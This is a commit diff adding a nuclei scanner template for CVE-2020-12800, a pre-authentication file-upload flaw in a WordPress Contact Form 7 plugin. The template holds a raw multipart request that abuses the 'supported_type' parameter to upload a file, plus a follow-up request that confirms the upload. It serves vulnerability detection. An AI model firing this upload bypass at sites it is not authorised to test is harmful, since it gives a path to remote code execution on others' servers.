Merge pull request #2472 from projectdiscovery/CVE-2020-12800

Added CVE-2020-12800
2021-08-24 05:22:48 +05:30 · 2021-08-24 05:22:48 +05:30 · c81b874095
parent a293b4c01b 85f8cf2c41
commit c81b874095
1 changed files with 59 additions and 0 deletions
--- a/cves/2020/CVE-2020-12800.yaml
+++ b/cves/2020/CVE-2020-12800.yaml
@ -0,0 +1,59 @@
+id: CVE-2020-12800
+
+info:
+  name: WordPress 'Drag & Drop Multiple File Upload - Contact Form 7' Plugin - Pre-auth RCE
+  author: dwisiswant0
+  severity: critical
+  description: The drag-and-drop-multiple-file-upload-contact-form-7 plugin before 1.3.3.3 for WordPress allows Unrestricted File Upload and remote code execution by setting supported_type to php% and uploading a .php% file.
+  reference: https://github.com/amartinsec/CVE-2020-12800
+
+requests:
+  - raw:
+      - |
+        POST /wp-admin/admin-ajax.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: multipart/form-data; boundary=---------------------------350278735926454076983690555601
+        X-Requested-With: XMLHttpRequest
+
+        -----------------------------350278735926454076983690555601
+        Content-Disposition: form-data; name="supported_type"
+
+        txt%
+        -----------------------------350278735926454076983690555601
+        Content-Disposition: form-data; name="size_limit"
+
+        5242880
+        -----------------------------350278735926454076983690555601
+        Content-Disposition: form-data; name="action"
+
+        dnd_codedropz_upload
+        -----------------------------350278735926454076983690555601
+        Content-Disposition: form-data; name="type"
+
+        click
+        -----------------------------350278735926454076983690555601
+        Content-Disposition: form-data; name="upload-file"; filename="{{randstr}}.txt%"
+        Content-Type: application/x-httpd-php
+
+        CVE-2020-12800-{{randstr}}
+        -----------------------------350278735926454076983690555601--
+
+      - |
+        GET /wp-content/uploads/wp_dndcf7_uploads/wpcf7-files/{{randstr}}.txt HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        part: body
+        words:
+          - "CVE-2020-12800-{{randstr}}"
+
+      - type: word
+        part: header
+        words:
+          - "text/plain"